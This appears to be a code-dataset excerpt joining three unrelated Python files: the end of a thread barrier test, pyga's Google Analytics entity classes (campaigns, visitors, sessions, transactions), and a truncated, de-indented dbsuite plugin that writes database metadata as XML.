    # All trips done: check out, last thread releases 'done'.
    mutex.acquire()
    running = running - 1
    if running == 0:
        done.release()
    mutex.release()
# Phase 2: barrier test.  'done' must still be held from phase 1 (the
# non-blocking acquire(0) must fail); the last task2 thread releases it.
print '\n*** Barrier Test ***'
if done.acquire(0):
    raise ValueError, "'done' should have remained acquired"
bar = barrier(numtasks)
running = numtasks
for i in range(numtasks):
    thread.start_new_thread(task2, (i,))
done.acquire()
print 'all tasks done'
| gpl-2.0 |
brysonreece/Stream | resources/site-packages/pyga/entities.py | 16 | 19442 | # -*- coding: utf-8 -*-
from datetime import datetime
from operator import itemgetter
from urlparse import urlparse
from urllib import unquote_plus
from pyga import utils
from pyga import exceptions
__author__ = "Arun KR (kra3) <the1.arun@gmail.com>"
__license__ = "Simplified BSD"
class Campaign(object):
    '''
    A representation of a Google Analytics campaign.

    Properties:
    _type -- See TYPE_* constants, will be mapped to "__utmz" parameter.
    creation_time -- Time of the creation of this campaign, will be mapped to "__utmz" parameter.
    response_count -- Response Count, will be mapped to "__utmz" parameter.
                      Is also used to determine whether the campaign is new or repeated,
                      which will be mapped to "utmcn" and "utmcr" parameters.
    id -- Campaign ID, a.k.a. "utm_id" query parameter for ga.js.
          Will be mapped to "__utmz" parameter.
    source -- Source, a.k.a. "utm_source" query parameter for ga.js.
              Will be mapped to "utmcsr" key in "__utmz" parameter.
    g_click_id -- Google AdWords Click ID, a.k.a. "gclid" query parameter for ga.js.
                  Will be mapped to "utmgclid" key in "__utmz" parameter.
    d_click_id -- DoubleClick (?) Click ID. Will be mapped to "utmdclid" key in "__utmz" parameter.
    name -- Name, a.k.a. "utm_campaign" query parameter for ga.js.
            Will be mapped to "utmccn" key in "__utmz" parameter.
    medium -- Medium, a.k.a. "utm_medium" query parameter for ga.js.
              Will be mapped to "utmcmd" key in "__utmz" parameter.
    term -- Terms/Keywords, a.k.a. "utm_term" query parameter for ga.js.
            Will be mapped to "utmctr" key in "__utmz" parameter.
    content -- Ad Content Description, a.k.a. "utm_content" query parameter for ga.js.
               Will be mapped to "utmcct" key in "__utmz" parameter.
    '''
    TYPE_DIRECT = 'direct'
    TYPE_ORGANIC = 'organic'
    TYPE_REFERRAL = 'referral'
    CAMPAIGN_DELIMITER = '|'
    # Maps "__utmz" cookie keys to the corresponding attribute names.
    UTMZ_PARAM_MAP = {
        'utmcid': 'id',
        'utmcsr': 'source',
        'utmgclid': 'g_click_id',
        'utmdclid': 'd_click_id',
        'utmccn': 'name',
        'utmcmd': 'medium',
        'utmctr': 'term',
        'utmcct': 'content',
    }

    def __init__(self, typ):
        '''Create a campaign of the given type (one of the TYPE_* constants,
        or a false value for an untyped campaign); pre-populates the standard
        name/source/medium values for each known type.'''
        self._type = None
        self.creation_time = None
        self.response_count = 0
        self.id = None
        self.source = None
        self.g_click_id = None
        self.d_click_id = None
        self.name = None
        self.medium = None
        self.term = None
        self.content = None
        if typ:
            # Validate against the class constants rather than re-spelling
            # the literals, so the check stays in sync with TYPE_*.
            if typ not in (Campaign.TYPE_DIRECT, Campaign.TYPE_ORGANIC, Campaign.TYPE_REFERRAL):
                raise ValueError('Campaign type has to be one of the Campaign::TYPE_* constant values.')
            self._type = typ
            if typ == Campaign.TYPE_DIRECT:
                self.name = '(direct)'
                self.source = '(direct)'
                self.medium = '(none)'
            elif typ == Campaign.TYPE_REFERRAL:
                self.name = '(referral)'
                self.medium = 'referral'
            elif typ == Campaign.TYPE_ORGANIC:
                self.name = '(organic)'
                self.medium = 'organic'
        self.creation_time = datetime.utcnow()

    def validate(self):
        '''Raise ValidationError unless the mandatory "source" attribute is set.'''
        if not self.source:
            raise exceptions.ValidationError('Campaigns need to have at least the "source" attribute defined.')

    @staticmethod
    def create_from_referrer(url):
        '''Build a referral campaign from a referrer URL: the host becomes
        the source and the path becomes the content.'''
        obj = Campaign(Campaign.TYPE_REFERRAL)
        parse_rslt = urlparse(url)
        obj.source = parse_rslt.netloc
        obj.content = parse_rslt.path
        return obj

    def extract_from_utmz(self, utmz):
        '''Populate this campaign from a "__utmz" cookie value and return self.

        Expected format: <domainhash>.<timestamp>.<sessions>.<responses>.<key=value|...>
        Raises ValueError if the cookie does not have five dot-separated parts.
        '''
        parts = utmz.split('.', 4)
        if len(parts) != 5:
            raise ValueError('The given "__utmz" cookie value is invalid.')
        self.creation_time = utils.convert_ga_timestamp(parts[1])
        self.response_count = int(parts[3])
        params = parts[4].split(Campaign.CAMPAIGN_DELIMITER)
        for param in params:
            # BUG FIX: split on the first "=" only -- the original
            # param.split('=') raised ValueError on parameters whose value
            # contained an "=" or that had no "=" at all.  partition() is
            # tolerant of both: unknown/malformed keys are simply skipped.
            key, _, val = param.partition('=')
            try:
                setattr(self, self.UTMZ_PARAM_MAP[key], unquote_plus(val))
            except KeyError:
                continue
        return self
class CustomVariable(object):
    '''
    Represent a Custom Variable

    Properties:
    index -- Is the slot, you have 5 slots (1-5)
    name -- Name given to custom variable
    value -- Value for the variable
    scope -- Scope can be any one of 1 (visitor), 2 (session) or 3 (page).

    WATCH OUT: It's a known issue that GA will not decode URL-encoded
    characters in custom variable names and values properly, so spaces
    will show up as "%20" in the interface etc. (applicable to name & value)
    http://www.google.com/support/forum/p/Google%20Analytics/thread?tid=2cdb3ec0be32e078
    '''
    SCOPE_VISITOR = 1
    SCOPE_SESSION = 2
    SCOPE_PAGE = 3

    def __init__(self, index=None, name=None, value=None, scope=3):
        self.index = index
        self.name = name
        self.value = value
        # Fall back to page scope when no (truthy) scope was supplied.
        self.scope = scope if scope else CustomVariable.SCOPE_PAGE

    def __setattr__(self, name, value):
        '''Validate "scope" and "index" on assignment; other attributes pass through.'''
        if name == 'scope':
            if value and value not in (CustomVariable.SCOPE_VISITOR,
                                       CustomVariable.SCOPE_SESSION,
                                       CustomVariable.SCOPE_PAGE):
                raise ValueError('Custom Variable scope has to be one of the 1,2 or 3')
        if name == 'index':
            # Custom Variables are limited to five slots officially, but there seems to be a
            # trick to allow for more of them which we could investigate at a later time (see
            # http://analyticsimpact.com/2010/05/24/get-more-than-5-custom-variables-in-google-analytics/
            # BUG FIX: the original check "value and (value < 0 or value > 5)"
            # silently accepted index 0, contradicting the error message and
            # the documented 1-5 range; enforce the documented contract.
            if value is not None and not 1 <= value <= 5:
                raise ValueError('Custom Variable index has to be between 1 and 5.')
        object.__setattr__(self, name, value)

    def validate(self):
        '''
        According to the GA documentation, there is a limit to the combined size of
        name and value of 64 bytes after URL encoding,
        see http://code.google.com/apis/analytics/docs/tracking/gaTrackingCustomVariables.html#varTypes
        and http://xahlee.org/js/google_analytics_tracker_2010-07-01_expanded.js line 563
        This limit was increased to 128 bytes BEFORE encoding with the 2012-01 release of ga.js however,
        see http://code.google.com/apis/analytics/community/gajs_changelog.html
        '''
        # NOTE(review): this counts characters, not encoded bytes -- assumed
        # acceptable for the 128-char pre-encoding limit; confirm for
        # non-ASCII names/values.
        if len('%s%s' % (self.name, self.value)) > 128:
            raise exceptions.ValidationError('Custom Variable combined name and value length must not be larger than 128 bytes.')
class Event(object):
    '''
    Represents an Event
    http://code.google.com/apis/analytics/docs/tracking/eventTrackerOverview.html

    Properties:
    category -- The general event category
    action -- The action for the event
    label -- An optional descriptor for the event
    value -- An optional value associated with the event; shown in the
             Overview, Categories and Actions reports, per event or
             aggregated across events depending on the report view.
    noninteraction -- When true, this event hit is excluded from bounce
                      rate calculations (default False).
    '''

    def __init__(self, category=None, action=None, label=None, value=None, noninteraction=False):
        self.category = category
        self.action = action
        self.label = label
        self.value = value
        self.noninteraction = True if noninteraction else False
        # A non-interaction event without an explicit value is reported as 0.
        if self.noninteraction and not self.value:
            self.value = 0

    def validate(self):
        '''Raise ValidationError unless both category and action are set.'''
        if not self.category or not self.action:
            raise exceptions.ValidationError('Events, at least need to have a category and action defined.')
class Item(object):
    '''
    Represents a single line item within a Transaction.

    Properties:
    order_id -- Order ID, will be mapped to "utmtid" parameter
    sku -- Product Code (sku) for the product, will be mapped to "utmipc" parameter
    name -- Product Name, will be mapped to "utmipn" parameter
    variation -- Variations on an item, will be mapped to "utmiva" parameter
    price -- Unit Price (numbers only), will be mapped to "utmipr" parameter
    quantity -- Unit Quantity, will be mapped to "utmiqt" parameter
    '''

    def __init__(self):
        # Everything starts unset; quantity defaults to a single unit.
        self.order_id = None
        self.sku = None
        self.name = None
        self.variation = None
        self.price = None
        self.quantity = 1

    def validate(self):
        '''Raise ValidationError unless the mandatory "sku" attribute is set.'''
        if self.sku:
            return
        raise exceptions.ValidationError('sku/product is a required parameter')
class Page(object):
    '''
    Holds every parameter needed to track a single page view.

    Properties:
    path -- Page request URI, will be mapped to "utmp" parameter
    title -- Page title, will be mapped to "utmdt" parameter
    charset -- Charset encoding, will be mapped to "utmcs" parameter
    referrer -- Referer URL, will be mapped to "utmr" parameter
    load_time -- Page load time in milliseconds, encoded into "utme" parameter
    '''
    REFERRER_INTERNAL = '0'

    def __init__(self, path):
        # Assigning through __setattr__ validates the path immediately.
        self.path = path if path else None
        self.title = None
        self.charset = None
        self.referrer = None
        self.load_time = None

    def __setattr__(self, name, value):
        '''Validate "path" (must start with "/") and "load_time" (must be int).'''
        if name == 'path' and value and value != '':
            if not value.startswith('/'):
                raise ValueError('The page path should always start with a slash ("/").')
        elif name == 'load_time' and value and not isinstance(value, int):
            raise ValueError('Page load time must be specified in integer milliseconds.')
        object.__setattr__(self, name, value)
class Session(object):
    '''
    Serialize this object into the user session to keep it persistent between
    requests (mirrors the "__utmb" cookie of the GA Javascript client).

    Properties:
    session_id -- A unique per-session ID, will be mapped to "utmhid" parameter
    track_count -- Number of pageviews tracked in this session so far; part of
                   the "__utmb" cookie.  Incremented automatically per request.
    start_time -- Timestamp of the start of this session; part of "__utmb".
    '''

    def __init__(self):
        self.session_id = utils.get_32bit_random_num()
        self.track_count = 0
        self.start_time = datetime.utcnow()

    @staticmethod
    def generate_session_id():
        '''Return a fresh random 32-bit session identifier.'''
        return utils.get_32bit_random_num()

    def extract_from_utmb(self, utmb):
        '''
        Populate "track_count" and "start_time" from a "__utmb" cookie value
        (four dot-separated fields) and return self.
        '''
        fields = utmb.split('.')
        if len(fields) != 4:
            raise ValueError('The given "__utmb" cookie value is invalid.')
        self.track_count = int(fields[1])
        self.start_time = utils.convert_ga_timestamp(fields[3])
        return self
class SocialInteraction(object):
    '''
    Properties:
    action -- Required. The social action being tracked, mapped to "utmsa".
    network -- Required. The social network being tracked, mapped to "utmsn".
    target -- Optional. The URL (or resource) receiving the action.
    '''

    def __init__(self, action=None, network=None, target=None):
        self.action = action
        self.network = network
        self.target = target

    def validate(self):
        '''Raise ValidationError unless both action and network are set.'''
        if self.action and self.network:
            return
        raise exceptions.ValidationError('Social interactions need to have at least the "network" and "action" attributes defined.')
class Transaction(object):
    '''
    Parameters for a Transaction call.

    Properties:
    order_id -- Order ID, will be mapped to "utmtid" parameter
    affiliation -- Affiliation, will be mapped to "utmtst" parameter
    total -- Total Cost, will be mapped to "utmtto" parameter
    tax -- Tax Cost, will be mapped to "utmttx" parameter
    shipping -- Shipping Cost, will be mapped to "utmtsp" parameter
    city -- Billing City, will be mapped to "utmtci" parameter
    state -- Billing Region, will be mapped to "utmtrg" parameter
    country -- Billing Country, will be mapped to "utmtco" parameter
    items -- entities.Item objects contained in this transaction
    '''

    def __init__(self):
        # "items" must be assigned first: setting "order_id" goes through
        # __setattr__, which iterates self.items.
        self.items = []
        self.order_id = None
        self.affiliation = None
        self.total = None
        self.tax = None
        self.shipping = None
        self.city = None
        self.state = None
        self.country = None

    def __setattr__(self, name, value):
        '''Keep every contained item's order_id in sync with the transaction's.'''
        if name == 'order_id':
            for entry in self.items:
                entry.order_id = value
        object.__setattr__(self, name, value)

    def validate(self):
        '''Raise ValidationError unless the transaction contains an item.'''
        if not self.items:
            raise exceptions.ValidationError('Transaction need to consist of at least one item')

    def add_item(self, item):
        '''Append *item* (an entities.Item), stamping it with our order id.'''
        if isinstance(item, Item):
            item.order_id = self.order_id
            self.items.append(item)
class Visitor(object):
    '''
    You should serialize this object and store it in the user database to keep it
    persistent for the same user permanently (similar to the "__umta" cookie of
    the GA Javascript client).

    Properties:
    unique_id -- Unique user ID, will be part of the "__utma" cookie parameter
    first_visit_time -- Time of the very first visit of this user, part of "__utma"
    previous_visit_time -- Time of the previous visit of this user, part of "__utma"
    current_visit_time -- Time of the current visit of this user, part of "__utma"
    visit_count -- Amount of total visits by this user, part of "__utma"
    ip_address -- IP Address of the end user, mapped to "utmip" parameter and "X-Forwarded-For" request header
    user_agent -- User agent string of the end user, mapped to "User-Agent" request header
    locale -- Locale string (country part optional), mapped to "utmul" parameter
    flash_version -- Visitor's Flash version, mapped to "utmfl" parameter
    java_enabled -- Visitor's Java support, mapped to "utmje" parameter
    screen_colour_depth -- Visitor's screen color depth, mapped to "utmsc" parameter
    screen_resolution -- Visitor's screen resolution, mapped to "utmsr" parameter
    '''

    def __init__(self):
        now = datetime.utcnow()
        self.unique_id = None
        self.first_visit_time = now
        self.previous_visit_time = now
        self.current_visit_time = now
        self.visit_count = 1
        self.ip_address = None
        self.user_agent = None
        self.locale = None
        self.flash_version = None
        self.java_enabled = None
        self.screen_colour_depth = None
        self.screen_resolution = None

    def __setattr__(self, name, value):
        '''Validate "unique_id" (None, or 0..0x7fffffff) on assignment.'''
        if name == 'unique_id':
            # BUG FIX: the original condition
            #   "value and value < 0 or value > 0x7fffffff"
            # parsed as "(value and value < 0) or (value > 0x7fffffff)",
            # which compares None against an int -- a TypeError on Python 3
            # (and only accidentally False on Python 2).
            if value is not None and (value < 0 or value > 0x7fffffff):
                raise ValueError('Visitor unique ID has to be a 32-bit integer between 0 and 0x7fffffff')
        object.__setattr__(self, name, value)

    def __getattribute__(self, name):
        # Lazily generate the unique ID the first time it is read.
        if name == 'unique_id':
            tmp = object.__getattribute__(self, name)
            if tmp is None:
                self.unique_id = self.generate_unique_id()
        return object.__getattribute__(self, name)

    def __getstate__(self):
        # NOTE(review): this returns (and mutates) self.__dict__ directly,
        # so pickling a visitor with no user_agent also sets unique_id on
        # the live instance -- preserved as-is; confirm that side effect is
        # intended before changing it.
        state = self.__dict__
        if state.get('user_agent') is None:
            state['unique_id'] = self.generate_unique_id()
        return state

    def extract_from_utma(self, utma):
        '''
        Will extract information for the "unique_id", "first_visit_time", "previous_visit_time",
        "current_visit_time" and "visit_count" properties from the given "__utma" cookie value.
        '''
        parts = utma.split('.')
        if len(parts) != 6:
            raise ValueError('The given "__utma" cookie value is invalid.')
        self.unique_id = int(parts[1])
        self.first_visit_time = utils.convert_ga_timestamp(parts[2])
        self.previous_visit_time = utils.convert_ga_timestamp(parts[3])
        self.current_visit_time = utils.convert_ga_timestamp(parts[4])
        self.visit_count = int(parts[5])
        return self

    def extract_from_server_meta(self, meta):
        '''
        Will extract information for the "ip_address", "user_agent" and "locale"
        properties from the given WSGI REQUEST META variable or equivalent.
        '''
        if 'REMOTE_ADDR' in meta and meta['REMOTE_ADDR']:
            ip = None
            # Prefer the forwarded-for chain, falling back to REMOTE_ADDR;
            # the last entry in a comma-separated list wins.
            for key in ('HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR'):
                if key in meta and not ip:
                    ips = meta.get(key, '').split(',')
                    ip = ips[-1].strip()
                    # Discard invalid and private addresses.
                    if not utils.is_valid_ip(ip):
                        ip = ''
                    if utils.is_private_ip(ip):
                        ip = ''
            if ip:
                self.ip_address = ip
        if 'HTTP_USER_AGENT' in meta and meta['HTTP_USER_AGENT']:
            self.user_agent = meta['HTTP_USER_AGENT']
        if 'HTTP_ACCEPT_LANGUAGE' in meta and meta['HTTP_ACCEPT_LANGUAGE']:
            user_locals = []
            matched_locales = utils.validate_locale(meta['HTTP_ACCEPT_LANGUAGE'])
            if matched_locales:
                # BUG FIX: the original built these with Python 2 map()/lambda
                # chains; on Python 3 map() returns a lazy (always-truthy)
                # iterator, breaking the subsequent truth tests and sorting.
                # List comprehensions are equivalent on both versions.
                lang_lst = [i[1].replace('-', '_') for i in matched_locales]
                # A missing quality value is treated as q=1.
                quality_lst = [float(i[4] or '0') or 1 for i in matched_locales]
                lang_quality_map = zip(lang_lst, quality_lst)
                user_locals = [x[0] for x in sorted(lang_quality_map, key=itemgetter(1), reverse=True)]
            if user_locals:
                self.locale = user_locals[0]
        return self

    def generate_hash(self):
        '''Generates a hashed value from user-specific properties.'''
        tmpstr = "%s%s%s" % (self.user_agent, self.screen_resolution, self.screen_colour_depth)
        return utils.generate_hash(tmpstr)

    def generate_unique_id(self):
        '''Generates a unique user ID from the current user-specific properties.'''
        return ((utils.get_32bit_random_num() ^ self.generate_hash()) & 0x7fffffff)

    def add_session(self, session):
        '''
        Updates the "previous_visit_time", "current_visit_time" and "visit_count"
        fields based on the given session object.
        '''
        start_time = session.start_time
        if start_time != self.current_visit_time:
            self.previous_visit_time = self.current_visit_time
            self.current_visit_time = start_time
            self.visit_count = self.visit_count + 1
| gpl-3.0 |
waveform80/dbsuite | dbsuite/plugins/xml/output/__init__.py | 1 | 21257 | # vim: set et sw=4 sts=4:
# Copyright 2012 Dave Hughes.
#
# This file is part of dbsuite.
#
# dbsuite is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# dbsuite is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# dbsuite. If not, see <http://www.gnu.org/licenses/>.
"""Output plugin for XML metadata storage."""
from __future__ import (
unicode_literals,
print_function,
absolute_import,
division,
)
import re
import logging
from string import Template
import dbsuite.plugins
from dbsuite.etree import (
fromstring, tostring, indent, Element, SubElement, CDATA
)
from dbsuite.db import (
Database, Schema, Datatype, Table, View, Alias, Field, UniqueKey,
PrimaryKey, ForeignKey, Check, Index, Trigger, Function, Procedure,
Param, Tablespace
)
class OutputPlugin(dbsuite.plugins.OutputPlugin):
"""Output plugin for metadata storage (in XML format).
This output plugin writes all database metadata into an XML file. This is
intended for use in conjunction with the xml.input plugin, if you want
metadata extraction and document creation to be performed separately (on
separate machines or at separate times), or if you wish to use db2makedoc
to provide metadata in a transportable format for some other application.
The DTD of the output is not fully documented at the present time. The best
way to learn it is to try the plugin with a database and check the result
(which can be indented for human consumption; see the indent parameter).
"""
def __init__(self):
"""Initializes an instance of the class."""
super(OutputPlugin, self).__init__()
self.add_option('filename', default=None, convert=self.convert_path,
doc="""The path and filename for the XML output file. Use $db or
${db} to include the name of the database in the filename. The
$dblower and $dbupper substitutions are also available, for forced
lowercase and uppercase versions of the name respectively. To
include a literal $, use $$""")
self.add_option('encoding', default='UTF-8',
doc="""The character encoding to use for the XML output file (optional)""")
self.add_option('indent', default=True, convert=self.convert_bool,
doc="""If true (the default), the XML will be indented for human readbility""")
def configure(self, config):
super(OutputPlugin, self).configure(config)
# Ensure we can find the specified encoding
''.encode(self.options['encoding'])
# Ensure the filename was specified
if not self.options['filename']:
raise dbsuite.plugins.PluginConfigurationError('The filename option must be specified')
def execute(self, database):
super(OutputPlugin, self).execute(database)
# Translate any templates in the filename option now that we've got the
# database
if not 'filename_template' in self.options:
self.options['filename_template'] = Template(self.options['filename'])
self.options['filename'] = self.options['filename_template'].safe_substitute({
'db': database.name,
'dblower': database.name.lower(),
'dbupper': database.name.upper(),
})
# Construct a dictionary mapping database objects to XML elements
# representing those objects
logging.debug('Constructing elements')
self.elements = {}
for db_object in database:
self.make_element(db_object)
# Stitch together the XML tree by adding each element to its parent
logging.debug('Constructing element hierarchy')
for db_object, element in self.elements.iteritems():
if db_object.parent:
parent = self.elements[db_object.parent]
parent.append(element)
# Find the root document element, convert the document to a string with
# an appropriate XML PI
logging.debug('Converting output')
root = self.elements[database]
if self.options['indent']:
indent(root)
s = unicode(tostring(root))
s = '<?xml version="1.0" encoding="%s"?>\n%s' % (self.options['encoding'], s)
# Check there aren't any silly characters (control characters / binary)
# lurking in the unicode version. Most codecs will blindly pass these
# through but they're invalid in XML
s = re.sub(r'[\x00-\x08\x0B\x0C\x0E-\x1F]+', lambda m: '?'*len(m.group()), s)
s = s.encode(self.options['encoding'])
# Finally, write the document to disk
logging.info('Writing output to "%s"' % self.options['filename'])
f = open(self.options['filename'], 'w')
try:
f.write(s)
finally:
f.close()
def make_element(self, db_object):
logging.debug('Constructing element for %s' % db_object.identifier)
self.elements[db_object] = {
Database: self.make_database,
Schema: self.make_schema,
Datatype: self.make_datatype,
Table: self.make_table,
View: self.make_view,
Alias: self.make_alias,
Field: self.make_field,
UniqueKey: self.make_unique_key,
PrimaryKey: self.make_primary_key,
ForeignKey: self.make_foreign_key,
Check: self.make_check,
Index: self.make_index,
Trigger: self.make_trigger,
Function: self.make_function,
Procedure: self.make_procedure,
Param: self.make_param,
Tablespace: self.make_tablespace,
}[type(db_object)](db_object)
def make_database(self, database):
result = Element('database')
result.attrib['id'] = database.identifier
result.attrib['name'] = database.name
return result
def make_schema(self, schema):
result = Element('schema')
result.attrib['id'] = schema.identifier
result.attrib['name'] = schema.name
if schema.owner:
result.attrib['owner'] = schema.owner
if schema.system:
result.attrib['system'] = 'system'
if schema.created:
result.attrib['created'] = schema.created.isoformat()
if schema.description:
SubElement(result, 'description').text = schema.description
return result
def make_datatype(self, datatype):
result = Element('datatype')
result.attrib['id'] = datatype.identifier
result.attrib['name'] = datatype.name
if datatype.owner:
result.attrib['owner'] = datatype.owner
if datatype.system:
result.attrib['system'] = 'system'
if datatype.created:
result.attrib['created'] = datatype.created.isoformat()
if datatype.variable_size:
result.attrib['variable'] = ['size', 'scale'][datatype.variable_scale]
if datatype.source:
result.attrib['source'] = datatype.source.identifier
if datatype.source.variable_size:
result.attrib['size'] = str(datatype.size)
if datatype.source.variable_scale:
result.attrib['scale'] = str(datatype.scale)
if datatype.description:
SubElement(result, 'description').text = datatype.description
return result
def make_table(self, table):
result = Element('table')
result.attrib['id'] = table.identifier
result.attrib['name'] = table.name
result.attrib['tablespace'] = table.tablespace.identifier
if table.owner:
result.attrib['owner'] = table.owner
if table.system:
result.attrib['system'] = 'system'
if table.created:
result.attrib['created'] = table.created.isoformat()
if table.last_stats:
result.attrib['laststats'] = table.last_stats.isoformat()
if table.cardinality:
result.attrib['cardinality'] = str(table.cardinality)
if table.size:
result.attrib['size'] = str(table.size)
if table.description:
SubElement(result, 'description').text = table.description
# XXX Add reverse dependencies?
# XXX Add associated triggers?
# XXX Add creation SQL?
return result
def make_view(self, view):
result = Element('view')
result.attrib['id'] = view.identifier
result.attrib['name'] = view.name
if view.owner:
result.attrib['owner'] = view.owner
if view.system:
result.attrib['system'] = 'system'
if view.created:
result.attrib['created'] = view.created.isoformat()
if view.read_only:
result.attrib['readonly'] = 'readonly'
if view.description:
SubElement(result, 'description').text = view.description
SubElement(result, 'sql').append(CDATA(view.sql))
for dependency in view.dependency_list:
SubElement(result, 'viewdep').attrib['ref'] = dependency.identifier
return result
def make_alias(self, alias):
result = Element('alias')
result.attrib['id'] = alias.identifier
result.attrib['name'] = alias.name
result.attrib['relation'] = alias.relation.identifier
if alias.owner:
result.attrib['owner'] = alias.owner
if alias.system:
result.attrib['system'] = 'system'
if alias.created:
result.attrib['created'] = alias.created.isoformat()
if alias.description:
SubElement(result, 'description').text = alias.description
# XXX Add creation SQL?
return result
def make_field(self, field):
result = Element('field')
result.attrib['id'] = field.identifier
result.attrib['name'] = field.name
result.attrib['position'] = str(field.position)
result.attrib['datatype'] = field.datatype.identifier
if field.datatype.variable_size:
result.attrib['size'] = str(field.size)
if field.datatype.variable_scale:
result.attrib['scale'] = str(field.scale)
if field.codepage:
result.attrib['codepage'] = str(field.codepage)
if field.nullable:
result.attrib['nullable'] = 'nullable'
if field.null_cardinality:
result.attrib['null_cardinality'] = str(field.null_cardinality)
if field.cardinality:
result.attrib['cardinality'] = str(field.cardinality)
if field.identity:
result.attrib['identity'] = 'identity'
if field.generated == 'N':
if field.default:
result.attrib['default'] = field.default
else:
result.attrib['generated'] = {
'A': 'always',
'D': 'default',
}[field.generated]
if field.default:
result.attrib['expression'] = field.default
if field.description:
SubElement(result, 'description').text = field.description
# XXX Add key position?
# XXX Add creation SQL?
return result
def make_unique_key(self, key):
result = Element('uniquekey')
result.attrib['id'] = key.identifier
result.attrib['name'] = key.name
if key.owner:
result.attrib['owner'] = key.owner
if key.system:
result.attrib['system'] = 'system'
if key.created:
result.attrib['created'] = key.created.isoformat()
if key.description:
SubElement(result, 'description').text = key.description
for field in key.fields:
SubElement(result, 'keyfield').attrib['ref'] = field.identifier
# XXX Include parent keys?
return result
def make_primary_key(self, key):
result = self.make_unique_key(key)
result.tag = 'primarykey'
return result
def make_foreign_key(self, key):
action_map = {
'A': 'noaction',
'C': 'cascade',
'N': 'setnull',
'R': 'restrict',
}
result = Element('foreignkey')
result.attrib['id'] = key.identifier
result.attrib['name'] = key.name
result.attrib['ondelete'] = action_map[key.delete_rule]
result.attrib['onupdate'] = action_map[key.update_rule]
result.attrib['references'] = key.ref_key.identifier
if key.owner:
result.attrib['owner'] = key.owner
if key.system:
result.attrib['system'] = 'system'
if key.created:
result.attrib['created'] = key.created.isoformat()
if key.description:
SubElement(result, 'description').text = key.description
for (field, parent) in key.fields:
e = SubElement(result, 'fkeyfield')
e.attrib['sourceref'] = field.identifier
e.attrib['targetref'] = parent.identifier
return result
def make_check(self, check):
result = Element('check')
result.attrib['id'] = check.identifier
result.attrib['name'] = check.name
if check.owner:
result.attrib['owner'] = check.owner
if check.system:
result.attrib['system'] = 'system'
if check.created:
result.attrib['created'] = check.created.isoformat()
if check.description:
SubElement(result, 'description').text = check.description
if check.expression:
SubElement(result, 'expression').text = check.expression
for field in check.fields:
SubElement(result, 'checkfield').attrib['ref'] = field.identifier
return result
def make_index(self, index):
result = Element('index')
result.attrib['id'] = index.identifier
result.attrib['name'] = index.name
result.attrib['table'] = index.table.identifier
result.attrib['tablespace'] = index.tablespace.identifier
if index.owner:
result.attrib['owner'] = index.owner
if index.system:
result.attrib['system'] = 'system'
if index.created:
result.attrib['created'] = index.created.isoformat()
if index.last_stats:
result.attrib['laststats'] = index.last_stats.isoformat()
if index.cardinality:
result.attrib['cardinality'] = str(index.cardinality)
if index.size:
result.attrib['size'] = str(index.size)
if index.unique:
result.attrib['unique'] = 'unique'
if index.description:
SubElement(result, 'description').text = index.description
for (field, order) in index.field_list:
e = SubElement(result, 'indexfield')
e.attrib['ref'] = field.identifier
e.attrib['order'] = {
'A': 'asc',
'D': 'desc',
'I': 'include',
}[order]
# XXX Add creation SQL?
return result
def make_trigger(self, trigger):
result = Element('trigger')
result.attrib['id'] = trigger.identifier
result.attrib['name'] = trigger.name
result.attrib['relation'] = trigger.relation.identifier
result.attrib['time'] = {
'A': 'after',
'B': 'before',
'I': 'instead',
}[trigger.trigger_time]
result.attrib['event'] = {
'I': 'insert',
'U': 'update',
'D': 'delete',
}[trigger.trigger_event]
result.attrib['granularity'] = {
'R': 'row',
'S': 'statement',
}[trigger.granularity]
if trigger.owner:
result.attrib['owner'] = trigger.owner
if trigger.system:
result.attrib['system'] = 'system'
if trigger.created:
result.attrib['created'] = trigger.created.isoformat()
if trigger.description:
SubElement(result, 'description').text = trigger.description
if trigger.sql:
SubElement(result, 'sql').append(CDATA(trigger.sql))
for dependency in trigger.dependency_list:
SubElement(result, 'trigdep').attrib['ref'] = dependency.identifier
return result
def make_function(self, function):
result = Element('function')
result.attrib['id'] = function.identifier
result.attrib['name'] = function.name
result.attrib['specificname'] = function.specific_name
result.attrib['type'] = {
'C': 'column',
'R': 'row',
'T': 'table',
'S': 'scalar',
}[function.type]
result.attrib['access'] = {
None: 'none',
'N': 'none',
'C': 'contains',
'R': 'reads',
'M': 'modifies',
}[function.sql_access]
if function.owner:
result.attrib['owner'] = function.owner
if function.system:
result.attrib['system'] = 'system'
if function.created:
result.attrib['created'] = function.created.isoformat()
if function.deterministic:
result.attrib['deterministic'] = 'deterministic'
if function.external_action:
result.attrib['externalaction'] = 'externalaction'
if function.null_call:
result.attrib['nullcall'] = 'nullcall'
if function.description:
SubElement(result, 'description').text = function.description
if function.sql:
SubElement(result, 'sql').append(CDATA(function.sql))
return result
def make_procedure(self, procedure):
result = Element('procedure')
result.attrib['id'] = procedure.identifier
result.attrib['name'] = procedure.name
result.attrib['specificname'] = procedure.specific_name
result.attrib['access'] = {
None: 'none',
'N': 'none',
'C': 'contains',
'R': 'reads',
'M': 'modifies',
}[procedure.sql_access]
if procedure.owner:
result.attrib['owner'] = procedure.owner
if procedure.system:
result.attrib['system'] = 'system'
if procedure.created:
result.attrib['created'] = procedure.created.isoformat()
if procedure.deterministic:
result.attrib['deterministic'] = 'deterministic'
if procedure.external_action:
result.attrib['externalaction'] = 'externalaction'
if procedure.null_call:
result.attrib['nullcall'] = 'nullcall'
if procedure.description:
SubElement(result, 'description').text = procedure.description
if procedure.sql:
SubElement(result, 'sql').append(CDATA(procedure.sql))
return result
def make_param(self, param):
result = Element('parameter')
result.attrib['id'] = param.identifier
result.attrib['name'] = param.name
result.attrib['type'] = {
'I': 'in',
'O': 'out',
'B': 'inout',
'R': 'return',
}[param.type]
result.attrib['position'] = str(param.position)
result.attrib['datatype'] = param.datatype.identifier
if param.datatype.variable_size:
if param.size is not None:
result.attrib['size'] = str(param.size)
if param.datatype.variable_scale:
if param.scale is not None:
result.attrib['scale'] = str(param.scale)
if param.codepage:
result.attrib['codepage'] = str(param.codepage)
if param.description:
SubElement(result, 'description').text = param.description
return result
def make_tablespace(self, tablespace):
    """Build a <tablespace> XML element describing *tablespace*."""
    result = Element('tablespace')
    attrs = result.attrib
